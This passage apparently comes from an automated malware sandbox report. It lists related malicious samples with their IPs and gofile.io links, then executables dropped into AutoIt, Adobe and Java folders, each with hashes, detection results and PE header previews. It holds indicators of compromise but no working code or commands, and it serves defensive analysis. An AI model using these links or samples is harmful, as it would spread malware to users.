                                                                                                                                                                                                                                                                                                                                                                                                                  bot.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 34.249.145.219
                                                                                                                                                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 18.244.18.38
                                                                                                                                                                                                                                                                                                                                                                                                                  https://docs.google.com/drawings/d/14Q1EGmG0TWb0poSuSYwhNHZWOm-kG4Jlnk5Hg076lVI/preview?pli=132E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlGet hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 18.245.31.89
                                                                                                                                                                                                                                                                                                                                                                                                                  https://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 45.112.123.225
                                                                                                                                                                                                                                                                                                                                                                                                                  rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 52.60.87.163
                                                                                                                                                                                                                                                                                                                                                                                                                  https://gofile.io/d/IAr464Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 45.112.123.225
                                                                                                                                                                                                                                                                                                                                                                                                                  https://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 45.112.123.225

                                                                                                                                                                                                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1508864
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.879313658335004
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:szCAR0ic/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:sCAYLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:EFB1502CF1CAC9DD47758133205A1D6D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:DC89846E3FAC9A922F5A659188BE9C2C0812DF46
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:B3D2A5C6AF475833EF605F3C21ABC10A757AA8BE84110DDF73C5ED555A5F2498
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:5DBA0747AB67C0EFB7C6447CD53B2D9EE9822CA6B68C0FA444566A6401773C102FA5019F1487E20B8F7F0E95729DC7FDE1D7B26D8F9F9333C7E35A02A9C8522E
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@.................................#v......................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....`...p.......f..............@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1450496
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.821235888243559
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:5CbKgB/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ULNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:3F9408CDCAAF94DEE563BB33AC84537C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:B3BB9321668D2101810F2BB37BB90522C91E146E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:EC1671F3AEB2D508CB7F6F012ACE39D0BC2F550F9A04819602E7E48B48DD9CAA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:4F731E3043CA2DB44E6FA6E772ADB396A2FEC6FD0D8C89C90DF46592E413104E5719EC8FE796FC1BB5F4696E350AEECD10700CD8DE6E2BCEA45595DF9D9E873A
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@...........................-.............................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...p...`.......r..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1469952
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.819280622695143
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:kKdHo/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xdILNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:2BAA1B9CBEB6FE4B472878C72334A920
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:70EE144677FC3008C7887C9D89C4F8950CB2B94D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:9ACDEC80707A4504E16E4A89CAB2C25BD32A8F9CEEAA52423C189B97D684937C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:C2C54C81DD8E6F8D377D31DD848F25132BDE8571691A86AF8D5FEADA45DDC0C02D11C1308A5B46A3A4F2CC97BC6459FCFF90CE02EDF792D69ABC4C3E908E3E99
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@.............................0.......$.... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...`..........................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2203136
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.644273634751725
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:WK0eqkSR7Xgo4TiRPnLWvJALNiXicJFFRGNzj3:WK0pR7Xn4TiRCvJA7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:4724B2E5C75F0892491949209A88AAC8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:D2A90C77FA10E7AD1CA1D1D696A5B21E23E44596
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:F4481C875E51C648D42533E6E7BA471E7F484399D618DE45D624D55E437D6D3E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:A1C63E1B000B427646CEEB0E31B363E575A9A429E3BAA646CCC8C8822D782CD3B5C7272AF13E92B4FDA9C12843DC927FB179B45B67AB497BE179333B311CCDFC
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".......!..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2369024
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.562603341825506
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:JfYP1JsEDkSR7Xgo4TiRPnLWvJALNiXicJFFRGNzj3:5YPBR7Xn4TiRCvJA7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:079BAA2941330ABB4CCAA54C4D5A6043
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:FC3386ADA629811074A731954359CD13FF8E757B
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:06AE397338BFA1A291C2A0F802C46976B008E570CBADC0A4E5B42AB65CECA536
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:4D7F9B7C8360779BF7328182D9E816FD06E2CE0D00BF93F660E87DDD52B7998897B65B6AE27D5E8227D87BA58C76ED4C338FC1619D3087C66A0FBB933617A087
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.....D.$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1400832
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6565601801305325
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:mYUckn6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:mZckn6LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:2DB099C6A110E8CD79A2BC7F46259429
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:FEC4FA1D73A71D643D122E6847DA93D95180475E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:E5CA2FDD83840051B29730504660D085D3B30D75B831D1344D7CF76194F6C4D9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:C87C400122D76811E85AA85226B59A87FECC7B454E64443F37439E9BB815BD1312C3F73BA05632B1FEC0F97D0164A1113DE1CBCE79A760C422704AA52E986C42
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................P .....G/.......................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...p..........................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1640448
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.161593077257909
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:7+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaS0LNiXicJFFRGNzj3:ZSktbp67wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:64BB6B79282579232C646625DAD60F8C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:476B51803D456BB6862A7830FF8F1947EB451BBB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:9E292C65058D419274C39EA3E15607A441E6ED88EA4BB4B50575F960EB121E4C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:98A3F09E474A88AB1AC21979E9D0AD49D7F531AADC730081A42DA9E17A9295C0CF6C71427EBC7493C7648B99B7A24C904035FD4CB858BC867EDE50CC3A600406
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.....................................o.... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2953728
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.091294047810581
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:JGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLjLNiXicJFFRGNzj3:d4OEtwiICvYMRfD7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:BF1B290FCE99CD25FA653BAFBA0510A3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:BFAA8CA06902A0AC197956F3D4BCD93DAF6FDE51
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:7DC6ED68D93F9EC925701CC4663634DE6A2AC4DB6E91FD87177EAAC5EB8A26E3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:76B94B2B5F36BC8E35FB654E530243CCD7F0497F89DAFD881011EA83BB7AB2713EA38B26F8699399CE70192DC4E362321547FC6C1D87E8DFF02C98DEFBEBB3A4
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-......~-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1641472
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0793566651380155
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:gAMJR+3kMbVjhs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:hi+lbVjhsLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:8DE05C7A59091AB8240A6DC246620747
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:ACA54533563F3CF9C2D6BABCB1010FE4BE6C1DA5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:CFAAB396943383F31A22FEBBE333CF90E7F8BF132B3DA6C3C038236205147EA7
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:D0BD792BDB497F3256B0CAC1E8807CEAA0C8DB6CC21CF7E9104EE5981BB78852D4615786FDBB8DCCCB938B653F22C15FA74932FF1E2C792D5AF78238DC52134A
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@.......................... $.....R........................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...............<..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1445888
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.815247094760056
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:7xGBcmlY/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:1Gy+YLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:828741995F05BE2FD6B071628F96F6B9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:7F21CCC1B2A924233B45A9D604E34EA233ECB037
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:166C97DA0D7C996606139D0F32FE0989F7CD7D746EBF73EAC872214670C450C6
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:ECBA401716996EC0076EF928A0A5581BFEBE48834FBF992A32A725C20C3D71AE8AC501E2CA80E9ED834B18D76A0E35506B3C88CA88537EE98403EF0B2EC9FCB9
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@...........................!.....D.......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...p...........`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1800192
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.306024821113753
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
